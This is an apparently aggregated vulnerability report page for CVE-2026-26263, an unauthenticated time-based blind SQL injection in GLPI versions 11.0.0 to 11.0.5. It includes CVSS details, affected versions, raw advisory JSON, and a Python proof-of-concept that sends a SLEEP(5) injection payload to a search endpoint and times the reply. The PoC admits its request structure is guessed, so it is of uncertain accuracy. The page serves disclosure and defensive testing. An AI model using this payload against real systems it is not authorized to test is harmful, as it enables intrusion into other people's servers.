Security Vulnerability Report
中文
CVE-2026-26263 CVSS 8.1 HIGH

CVE-2026-26263

Published: 2026-04-06 15:17:07
Last Modified: 2026-04-07 16:02:38

Description

GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, an unauthenticated time-based blind SQL injection exists in GLPI's Search engine. This vulnerability is fixed in 11.0.6.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* - VULNERABLE
GLPI 11.0.0
GLPI 11.0.1
GLPI 11.0.2
GLPI 11.0.3
GLPI 11.0.4
GLPI 11.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # Target URL configuration # The vulnerability exists in the search engine, typically accessible via a specific endpoint. # Replace 'http://target-glpi.com' with the actual target address. target_url = "http://target-glpi.com/front/search.php" # Payload demonstrating time-based blind SQL injection # This payload attempts to check if the database waits for 5 seconds. # Adjust the parameter names based on the actual request structure captured via Burp Suite or proxy. payload = { "criteria": { "0": { "field": "1", "searchtype": "contains", "value": "test' AND (SELECT SLEEP(5))-- " } } } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/json" } try: start_time = time.time() # Sending the request (Note: parameter structure may vary, check actual traffic) response = requests.get(target_url, params=payload, headers=headers, timeout=10) end_time = time.time() response_time = end_time - start_time if response_time > 5: print(f"[+] Vulnerability Confirmed! Response time: {response_time:.2f}s") else: print(f"[-] Not detected or patched. Response time: {response_time:.2f}s") except requests.exceptions.RequestException as e: print(f"Error connecting to target: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-26263", "sourceIdentifier": "[email protected]", "published": "2026-04-06T15:17:07.430", "lastModified": "2026-04-07T16:02:38.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, an unauthenticated time-based blind SQL injection exists in GLPI's Search engine. This vulnerability is fixed in 11.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.6", "matchCriteriaId": "7BF95FA7-1F5E-4D44-B291-5576720FB714"}]}]}], "references": [{"url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-346p-qj3v-9rxj", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}